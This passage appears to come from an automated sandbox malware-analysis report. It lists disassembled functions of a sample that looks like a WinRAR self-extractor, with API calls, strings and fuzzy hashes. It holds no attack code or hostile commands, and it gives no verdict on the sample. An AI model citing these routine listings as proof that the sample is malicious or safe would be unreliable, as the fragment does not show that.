                                                              • Instruction Fuzzy Hash: FD210532204214BBDA126F6AFD8DF3B3B6CFB56B41F050019F601EA4A0CB62AE019631
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089FE1F
                                                              • _com_issue_error.COMSUPP ref: 0089FE48
                                                              • _com_issue_error.COMSUPP ref: 0089FE52
                                                              • GetLastError.KERNEL32(80070057,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE57
                                                              • _com_issue_error.COMSUPP ref: 0089FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE80
                                                              • _com_issue_error.COMSUPP ref: 0089FE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 3519838083-3505469590
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00889387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008893AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008893C9
                                                                • Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • _swprintf.LIBCMT ref: 00889465
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 008894D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00889514
                                                              Strings
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0089122E
                                                                • Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00891251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00891263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00891274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008912CF
                                                              • __aullrem.LIBCMT ref: 00891379
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00882536
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                              Strings
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008AFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 008AF6CF
                                                              • __fassign.LIBCMT ref: 008AF74A
                                                              • __fassign.LIBCMT ref: 008AF765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008AF78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7E3
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A2937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 008A293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A29C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 008A29F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A2A48
                                                              Strings
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00899EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00899F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00899FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00899FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00899FF9
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName
                                                              • API String ID: 3937224194-1658105358
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
                                                              • Instruction ID: 88fbf34d6f46b83201030b4c2a15067bb34ccfbc22a8381950f8ee7889740ec7
                                                              • Opcode Fuzzy Hash: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
                                                              • Instruction Fuzzy Hash: 57318B3264431556EE34BB5C9C03B7A73E4FB91320F58841FF4C6D7280FAA4AD9083A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AC868: _free.LIBCMT ref: 008AC891
                                                              • _free.LIBCMT ref: 008AC8F2
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008AC8FD
                                                              • _free.LIBCMT ref: 008AC908
                                                              • _free.LIBCMT ref: 008AC95C
                                                              • _free.LIBCMT ref: 008AC967
                                                              • _free.LIBCMT ref: 008AC972
                                                              • _free.LIBCMT ref: 008AC97D
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: 6ac289a09407c778afec09ec23680d2eedb56ab7f7899baaea9457ec707636d9
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 0811FC71580B04EAF520BBB5CC06FCB7BECFF06B00F404825B3ADE6892DB69A5058752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0089E669,0089E5CC,0089E86D), ref: 0089E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0089E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0089E630
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
                                                              • Instruction ID: d67d5dbf840ceb858b5cf808d2d7785a7930c6d108d663341d2f1bc911a4680b
                                                              • Opcode Fuzzy Hash: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
                                                              • Instruction Fuzzy Hash: 44F0C2317806625B4F33FEA95C886BA2BC8FB357453180539E901D7200EB24CC55DA90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008914C2
                                                                • Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008914E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00891500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00891513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891533
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
                                                              • Instruction ID: 8a9559029baf86a63f0b8cbd173920c3cf9063a096f30c5688eaff2d43fe154f
                                                              • Opcode Fuzzy Hash: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
                                                              • Instruction Fuzzy Hash: 5B31D775108346ABC704DFA8C88499BB7ECFF98754F044A1EF995C3210E730D549CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,008A2AF1,008A02FC,0089FA34), ref: 008A2B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008A2B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2B2F
                                                              • SetLastError.KERNEL32(00000000,008A2AF1,008A02FC,0089FA34), ref: 008A2B81
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
                                                              • Instruction ID: 7ee7cf312cc0556ef2f6e5120430470f2fca0e7bfe648e18d57a177e4a297c55
                                                              • Opcode Fuzzy Hash: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
                                                              • Instruction Fuzzy Hash: 5301B172109719AFB6342B7C6C85A662B59FF037747604739F511E5CE0EE114C029268
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
                                                              • _free.LIBCMT ref: 008A981C
                                                              • _free.LIBCMT ref: 008A9844
                                                              • SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A9851
                                                              • SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
                                                              • _abort.LIBCMT ref: 008A9863
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
                                                              • Instruction ID: f1cef9b47ba1d46d1f0c99f66e9644016afa6d3e95aeab3d09f6dc007c3de149
                                                              • Opcode Fuzzy Hash: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
                                                              • Instruction Fuzzy Hash: BEF0A435148A0566F71233386C0AA5B2B69FFD3B61F240234F664D2DA2FF2888028566
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089DC72
                                                              • TranslateMessage.USER32(?), ref: 0089DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0089DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC91
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
                                                              • Instruction ID: 55a6828971d18251f8df7c8679aefc673971eadfe81a69c002cc005ea95796f8
                                                              • Opcode Fuzzy Hash: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
                                                              • Instruction Fuzzy Hash: 25F03C72A01229BBCF20ABA5DC4CDDB7F6DFF41791B044111F50AD6050D6749A46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 0088B92D: _wcsrchr.LIBVCRUNTIME ref: 0088B944
                                                              • _wcslen.LIBCMT ref: 0088C197
                                                              • _wcslen.LIBCMT ref: 0088C1DF
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
                                                              • Instruction ID: 9fa9ad3eb207b9f33b4fe77f12a5170af6caf65092c897021e04b1eee728dc37
                                                              • Opcode Fuzzy Hash: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
                                                              • Instruction Fuzzy Hash: 2A41572655071599CB32BF788846A7BB3A8FF41744F14090EF892EB1C6EB704D81C3B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0089CE9D
                                                                • Part of subcall function 0088B690: _wcslen.LIBCMT ref: 0088B696
                                                              • _swprintf.LIBCMT ref: 0089CED1
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(?,00000066,008C946A), ref: 0089CEF1
                                                              • EndDialog.USER32(?,00000001), ref: 0089CFFE
                                                              Strings
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 110358324-1360425832
                                                              • Opcode ID: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
                                                              • Instruction ID: acbbc7b6b900db803d1a9d8d603a0cfffc0e0c2466cf78e5f7fc14d17250a08f
                                                              • Opcode Fuzzy Hash: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
                                                              • Instruction Fuzzy Hash: 7441BFB1800658AADF25EBA4CC45EEE77BCFB05301F4480A6F90AE7141EF718A44CF66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0088BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0088A275,?,?,00000800,?,0088A23A,?,0088755C), ref: 0088BBC5
                                                              • _wcslen.LIBCMT ref: 0088BC3B
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
                                                              • Instruction ID: 91ff8af6b0e8401a1f708d2c1c198ff9be99b8233cc3f3077279760dc6dc5421
                                                              • Opcode Fuzzy Hash: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
                                                              • Instruction Fuzzy Hash: B741AE3144021AAADF21BF64CC01EEA77AAFF81390F144466F865E3251EB74EE908B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0089B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0089B712
                                                              • DeleteObject.GDI32(00000000), ref: 0089B744
                                                              • DeleteObject.GDI32(00000000), ref: 0089B767
                                                                • Part of subcall function 0089A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
                                                                • Part of subcall function 0089A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
                                                                • Part of subcall function 0089A6C2: LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
                                                                • Part of subcall function 0089A6C2: LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
                                                                • Part of subcall function 0089A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
                                                                • Part of subcall function 0089A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
                                                                • Part of subcall function 0089A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
                                                                • Part of subcall function 0089A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6
                                                                • Part of subcall function 0089A6C2: GlobalFree.KERNEL32(00000000), ref: 0089A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                              • String ID: ]
                                                              • API String ID: 1428510222-3352871620
                                                              • Opcode ID: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
                                                              • Instruction ID: 29ab669a42fac498289cde23deeb5bbef0096bbe9c0128092523124da5c3ba90
                                                              • Opcode Fuzzy Hash: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
                                                              • Instruction Fuzzy Hash: DB01A13650051577CF1277B86D89A7B7ABAFBC0B62F1D0110F900E7291DB218D0542A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0089D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0089D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0089D684
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
                                                              • Instruction ID: 3b372c58768a1aecc9fe52f2543ace1f3d5b01c0d907b8a7f528b6706fc93deb
                                                              • Opcode Fuzzy Hash: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
                                                              • Instruction Fuzzy Hash: B9014533245314BADA126F649D09F57775CFBAAB01F040011F302E6091C7A29A049BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7E93
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A7EA6
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7EC9
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
                                                              • Instruction ID: 10396bd087268f9e8ea43bc7e65de5af1d79846572bfde94014ef9d0bdc09ee9
                                                              • Opcode Fuzzy Hash: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
                                                              • Instruction Fuzzy Hash: 11F06231A00608BBDB15AFA4DC09BDEBFB5FF44716F0042A9F905E2260DB349E55DA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
                                                              • GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
                                                              • Instruction ID: 6ef38eac7d06f4f5a640c923e358552d9b4b68b1fa0152d6c2f68a519ce3edb4
                                                              • Opcode Fuzzy Hash: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
                                                              • Instruction Fuzzy Hash: A4E04F70950B119ECB21AB789C49B41BBD8FF04700F24892DE0EAE3741D6B8D5418B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
                                                              • Instruction ID: 06569f67266c97ef3a16d941f7b264aa62232d365d91a9fd296a59e7d0e731b8
                                                              • Opcode Fuzzy Hash: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
                                                              • Instruction Fuzzy Hash: 2551C27150421AAFFB398F1CD845BAA77A5FF56320F24452DE802C7AA2E731ED40DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
                                                              • _free.LIBCMT ref: 008ABF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
                                                              • Instruction ID: 6e5cfaed70e3979e2c99ce0d04c53b31c5aa76cd4c8fb244a698de8f45a74a52
                                                              • Opcode Fuzzy Hash: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
                                                              • Instruction Fuzzy Hash: 60018472605A157F3321167A5C4DC7B7B6DFEC3BA13180229F904C2542EF608D0195B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,008C1030,00000200,008A91AD,008A617E,?,?,?,?,0088D984,?,?,?,00000004,0088D710,?), ref: 008A986E
                                                              • _free.LIBCMT ref: 008A98A3
                                                              • _free.LIBCMT ref: 008A98CA
                                                              • SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98D7
                                                              • SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98E0
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
                                                              • Instruction ID: 0ecf9a88962a340637be9976bc2d40fa7767470c25f4ccb543b035d64bc4086f
                                                              • Opcode Fuzzy Hash: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
                                                              • Instruction Fuzzy Hash: 1701F436148A096BF21233386C8991B262DFFD37B47210234F955D2EA2EF38CC029166
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008911CF: ResetEvent.KERNEL32(?), ref: 008911E1
                                                                • Part of subcall function 008911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008911F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00890F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00890F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00890F54
                                                              • CloseHandle.KERNEL32(?), ref: 00890F60
                                                              • CloseHandle.KERNEL32(?), ref: 00890F6C
                                                                • Part of subcall function 00890FE4: WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
                                                                • Part of subcall function 00890FE4: GetLastError.KERNEL32(?), ref: 00890FF6
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
                                                              • Instruction ID: a9cdf191db35029db1f80e04ddcb69d028dae76714d9d3ab76c8b79fc51ee7a9
                                                              • Opcode Fuzzy Hash: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
                                                              • Instruction Fuzzy Hash: C3012571504B44EFCB32AB64DD85BC6FBA9FF08710F000929F16B925A0CB757A55CB54
                                                              Uniqueness

